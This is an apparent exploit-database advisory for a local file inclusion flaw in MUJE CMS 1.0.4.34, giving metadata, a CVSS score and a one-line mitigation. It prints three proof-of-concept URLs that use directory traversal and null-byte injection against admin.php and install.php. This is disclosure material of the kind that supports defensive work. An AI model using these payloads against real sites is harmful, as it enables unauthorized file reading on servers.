vendor:
MUJE CMS
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: MUJE CMS
Affected Version From: 1.0.4.34
Affected Version To: 1.0.4.34
Patch Exists: NO
Related CWE: N/A
CPE: a:mujecms:mujecms:1.0.4.34
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
MUJE CMS 1.0.4.34 is vulnerable to Local File Inclusion. No admin is required for the exploit. The PoC's are http://127.0.0.1/path/admin.php?_class=../../../../../../boot.ini%00 and http://127.0.0.1/path/install/install.php?url=../../../../../../../boot.ini. Admin is required for the exploit http://127.0.0.1/path/admin.php?_htmlfile=../../../../../../boot.ini%00.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in file operations.